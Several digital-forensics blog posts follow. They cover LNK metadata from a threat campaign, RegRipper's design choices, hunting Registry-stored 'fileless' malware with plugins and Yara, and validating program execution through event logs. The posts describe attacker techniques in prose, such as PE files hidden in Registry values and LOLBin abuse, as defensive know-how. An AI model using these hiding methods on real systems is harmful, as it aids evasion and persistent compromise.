HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasArguments|EnableTargetMetadata|HasIconLocation|HasRelativePath

***PropertyStoreDataBlock***
GUID/ID pairs:
{28636aa6-953d-11d2-b5d6-00c04fd918d0}/30     ParsingPath: C:\Users\Village Manor 2022\Desktop\osha3165 - Copy.pdf
{446d16b1-8dad-4870-a748-402ea43d788c}/104    VolumeID: {ad378747-1bfd-4172-b598-a876b80c03d9}
{b725f130-47ef-101a-a5f1-02608c9eebac}/10     ItemNameDisplay: osha3165 - Copy.pdf
{b725f130-47ef-101a-a5f1-02608c9eebac}/12     Size: 16040764
{b725f130-47ef-101a-a5f1-02608c9eebac}/14     DateModified: Tue Jul 17 20:17:44 2012 Z
{b725f130-47ef-101a-a5f1-02608c9eebac}/15     DateCreated : Thu Feb  6 07:34:38 2025 Z
{b725f130-47ef-101a-a5f1-02608c9eebac}/4      ItemType: Microsoft Edge PDF Document
{e3e0584c-b788-4a5a-bb20-7f5a44c9acdd}/6      ItemFolderPathDisplay: C:\Use

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

***TrackerDataBlock***
Machine ID            : win-8oa3ccqae4d 
New Droid ID Time     : Fri Jan 31 14:29:24 2025 UTC
New Droid ID Seq Num  : 5988
New Droid    Node ID  : e0:09:88:3d:81:23
Birth Droid ID Time   : Fri Jan 31 14:29:24 2025 UTC
Birth Droid ID Seq Num: 5988
Birth Droid Node ID   : e0:09:88:3d:81:23

From the above output, and looking back to the Mandiant article, we can see a great deal about the developer's endpoint, including the workstation name "win-8oa3ccqae4d". We can also see a great deal of information that can likely be applied to the campaign, and by extension, be used to flesh out and provide context to both intrusion and threat intelligence.

However, it seems clear that the author of the FalconFeeds article is missing some knowledge of Windows artifacts and file structures. Running an LNK file through ANY.RUN is a method to use, but it should not be the only method that's used to develop information from that artifact. This also supports my thoughts CTI teams would benefit from a deep digital analysis skill sets, to develop and interpret artifacts from various systems and endpoints in a more thorough, correct manner. 

Thursday, July 03, 2025

RegRipper

The awesome folks over at Cyber Triage recently published their 2025 Guide to Registry Forensic Tools, and being somewhat interested in the Windows Registry, I was very interested to take a look. The article is very well-written, and provides an excellent basis for folks who are new to DF/IR work, and new to the Windows Registry.

Within the blog post, there's a table in the Registry Forensic Tools section (see the image to the right). In the image, we see that one of the metrics or indicators associated with the tools listed are whether or not the tool "handles transaction logs", with just a statement to that effect. 

If someone is new to including the Windows Registry as part of their analysis process, and doesn't understand the purpose of the transaction logs, nor how they work, they'd likely look at this table and think, "Well, I'm not using RegRipper! Handling the transaction logs are important to Chris Ray, and while I don't know why, I'm going to go along with what Chris recommends!"

The statement, "Does not handle transaction logs" doesn't tell the whole story, as I purposely wrote RegRipper to not handle the transaction logs. From my perspective, incorporating transaction logs into your analysis needs to be a purposeful, intentional decision. Incorporating transaction logs certainly has it's place in any analysis process for Windows systems, but it should not happen automagically, without the analyst/examiners knowledge. And it should not  just happen every time. Further, why should I write out code for processing transaction logs, when as it is, there are a number of other tools that already allow you to do so? Why re-write this capability? 

You know, this kind of thing has happened before. In 2012, at a pretty big DF/IR security conference, a Google engineer was presenting on an enterprise-wide response capability, and included a slide that said, "RegRipper does not scale to the enterprise." I was in the front row, because...you know...DF/IR, and was a little taken aback by this statement. This was like stating that the F-150 truck, the most popular model of light pickup, does not transition to airplane mode. No, because it was never intended to, and it wasn't designed that way. So, rather than reaching out and engaging the author of the tool, and asking, "hey, what do you think about making this an enterprise tool?", the presenter simply made their statement, and left it at that.

Now, why did I want handling the transaction logs to be a purposeful, intentional decision? If you've ever processed the transaction logs, you'll notice that when you apply the transaction logs to a Registry hive, the hive file itself remains the same size; keys and values are updated or added, but the file itself remains the same size, even through the hash changes. This means that for the resulting hive file, unallocated space within the hive file is overwritten...deleted keys and values, and possibly even slack space, are overwritten.

Why does this matter? Well, consider the recent write-up on the DEVMAN ransomware variant (from ANY.RUN). The image to the left discusses file lock evasion (the inclusion of "persistence" in the heading is a bit misleading), and states, "Each of these entries is quickly deleted after being written...", which means these entries become part of unallocated space. Now, this may not be important to you, based on your investigative goals...or it may be very important.

So, to be clear, if you're at all interested in data deleted from the Registry, and you understand that Registry hive files themselves contain unallocated space, and that values can contain slack space, you might not want to just automatically apply transaction logs. Depending upon the timing of the incident and your investigative goals, you may want to first fully parse the hive file, before applying the transaction logs and applying the same parsing process a second time. Sort of a "before" and "after" snapshot of the hive.

Neither RegRipper v3.0 nor RegRipper v4.0 processes the transaction logs; however, both are open source, and you can write your own plugins, or modify current plugins in any way you choose, such as changing the output format. For example, both versions include multiple plugins that output in 5-field TLN format (for inclusion directly into a timeline events file), and v4.0 has several plugins that output in JSON format. I get it, though...the TLN output is meaningless if you're not creating timelines.

Also, with RegRipper v4.0, I got Yara working within RegRipper, meaning that you can run Yara rules against Registry values, right from RegRipper.

Finally, both versions include plugins to do various parsing, such as parsing unallocated space, parsing Registry value sizes, locating EXE/PE files in Registry values, etc.

Monday, June 30, 2025

Hunting Fileless Malware

I ran across Manuel Arrieta's Hunting Fileless Malware in the Windows Registry article recently, and found it to be an interesting read.

Let me start by saying that the term "fileless malware", for me, is like finger nails dragged down a chalkboard. Part of this is due to the DarkWatchman write-up, where the authors stated that some parts of the malware were "...written to the Registry to avoid writing to disk." That kind of distinction has always just rubbed me the wrong way. However, regardless of what we call it, I do "get" the concept behind the turn of phrase, and why folks tend to feel that this sort of thing is more difficult to detect than malware that actually writes a file to disk. I'm not sure why they feel that way...maybe it's because this code that downloads the malware and injects it directly into memory (in some cases) can reside anywhere on the system, and within any Registry value. However, the key is that this somehow needs to remain persistent, which limits the number of locations for the code that initiates the download, accesses the shellcode, or performs whichever initiating function. 

In his article, Manuel discusses the use of LOLBins to write information to the Registry, and how this can be used for detection. He references several LOLBins, and something that we have to keep in mind is that there's often more to these detections than just what we see on the surface. For example, is PowerShell used extensively within your infrastructure to create Registry values; if not then just the use of PowerShell in that manner would make for a good hunt, or even a good detection opportunity. The same is true for other LOLBins, including reg.exe, rundll32.exe, etc. If these are not something that you usually 'see' within your infrastructure, then those instances that you do see would need to be investigated.

Manuel's article discusses a number of interesting approaches for creating detections for "fileless" malware that's written to the Registry, and anyone involved with detection engineering should strongly consider giving it a good, solid read, and seeing how it can be applied to their environment. 

I'd like to take the opportunity to add to Manuel's work by presenting means for detecting this type of malware from a triage or "dead box" perspective. For example, Manuel mentions looking for LOLBins writing Registry values of suspicious lengths. I like this approach, because I'd taken a similar approach in 2015 when I originally wrote the RegRipper sizes.pl plugin. This plugin walks through a Registry hive and looks for all values over a specific $min_size, which is set to 5000 bytes (you can easily change this by opening the plugin in Notepad and changing the size value). Now, you're going to have legitimate Registry values that contain a lot of data, and that's to be expected; it's normal. However, a way to extend this is to look to publicly available threat intel based on actual incident data, see what different threat actors are placing in Registry values, and tailor your approach. 

Almost 2 yrs ago, I announced that I'd found a way to integrate Yara into RegRipper v4.0, so any Yara rule that looks for indications of "fileless" malware or shellcode within a file can be run against Registry values, through RegRipper. This can include rules that look for base64-encoded strings, or that begin with some variation of "powershell" (i.e., mixed-case, carets between the letters, etc.).

The findexes.pl plugin, which looks for strings beginning with "MZ" in Registry values, was originally written in 2009, based off an engagement that Don Weber worked while he was a member of the IBM ISS X-Force ERS team. Don found that, during the engagement, the threat actor had written a PE file to a Registry value, and then rather than reaching out to a network resource to download the malware, it was simply extracted from the Registry value. I found this very interesting at the time, because several years prior, while working on network exploitation research for the military, I'd theorized something similar happening, and actually created a working demo. Jump forward several years, and Don was showing me that this was actually being used in the wild. This findexes.pl plugin is one approach, and using Yara rules is another.

Examples
Here's an example of a persistence mechanism in the Registry pointing to a value that contains a base64-encoded string.

Here's an example from Splunk; scroll down to the section called "Fileless Execution Through Registry"; this one creates a Run key value that creates Javascript code to run calc.exe, so it's clearly not "fileless", per se, but it does serve as a harmless example you can use to test dead-box detections.

Here are some practical examples from Securonix; unfortunately, some of the examples are in screen captures, so you can't get specifics about them, such as the length of the value data, but you can use these example to round out your detections.

Thursday, June 26, 2025

Program Execution, follow-up pt II

On the heels of my previous post on this topic, it occurred to me that this tendency to incorrectly refer to ShimCache and AmCache artifacts as "evidence of execution" strongly indicates that we're also not validating program execution. That is to say, when we "see" a program execution event, or something that indicates that a program may have executed, are we validating that it was successful? Are we looking to determine if it completed its intended task, or are we simply assuming that it did?

For example, let's say we have an alert based on a threat actor running a net user command to add a new user account to an endpoint; when I see this command, I want to check the Security Event Log to see if there are any Security-Auditing/4720 records at about the same time, to indicate that the command succeeded. The command will very likely be accompanied by other Security Event Log records related to the account being enabled, the password being reset, etc; however, the ../4720 event record is what primarily interests me, because sometimes, you'll see the net user command that does not include the /add or /ad switch, but is still reported as a "new user being created", when, in fact, the account already exists and the password is being changed.

Regardless of what's reported, the point here is, are we validating what we're seeing? Another example is the use of msiexec.exe; when we see a command using this LOLBin run, do we also see accompanying MsiInstaller records in the Application Event Log? I've seen reports of msiexec.exe being run against HTTP resources, stating that something was installed; however, there are no corresponding MsiInstaller records in the Application Event Log.

Another use of the Application Event Log, when validating program execution, comes when you timeline the log records alongside EDR telemetry or process launch (Sysmon, Security-Auditing/4688) records. For example, if you see Application Pop-up or Windows Error Reporting messages for the program around the same time as the program execution, this would indicate that the program did not successfully launch. 

Another similarly valuable resource is AV logs. You may see the program execution attempt, followed by an AV message indicating that the process was detected and quarantined. Or, as has occurred several times, Window Defender may generate a detection record, and rather than a successful quarantine message, the detection is followed by a critical failure message, and the malware continues to execute.

The great folks over at Cyber Triage posted this guide on Malware WMI Event Consumers; pg 6 illustrates the "Classic Detection" techniques. Looking at these, EDR/Sysmon, and the WMI-Activity/Operational Event Log can be incorporated into a timeline to not only illustrate program execution, but that the execution succeeded and resulted in the intended (by the threat actor) outcome. For example, if you incorporate EDR into a timeline that includes the Windows Event Logs, then you'd likely look for WMI-Activity/5861 event records to see if a new event consumer had been successfully created. 

From there, the next step would be to parse the Objects.DATA file to determine if the event consumer is still visible in the WMI repository. 

Summary
Continuing to see artifacts such as ShimCache and AmCache referred to in the community as "evidence of execution" really showed me how we're overall too focused on the one thing that illustrates that something happened. While it's important to have a correct, accurate understanding of the nature of various individual artifacts, as a community we need to start processing this understanding within a system framework, understanding that each data source plays an important role within the system, as a whole. Nothing happens in isolation; whenever something happens on a live system, impressions and tool marks are going to be left in a variety of data sources. Some may be extremely transient, existing in memory for only a very short time, while others may be written to logs or to the Registry, and persist well beyond the removal of the "offending" application. 

But, I get it. It's easy to simply state that something happened, and hope that no one questions your statement. It's much harder to make a statement supported by data, because doing so isn't something we're familiar with, it's not something we've been doing for years at this point. It's not part of our process, nor is it part of our culture. But remember...everything is difficult, sometimes even after the first time we do it. Climbing a rope in gym class was hard, until you first did it. It may even have been hard the second or third time, but eventually you realized you could do it. 

Validation of your findings is important, because when you complete the ticket or the report you're writing, and send it off to your "customer", someone may be making a decision and allocating resources based on those findings. My previous blog post provides one example of how I've experienced the need to validate findings during my time in the industry. Whether you see it right now or not, at some point, someone's very likely going to take your findings and make a decision based on what you're provided, and you want to be as sure as you can that those findings are correct, and supported by the data.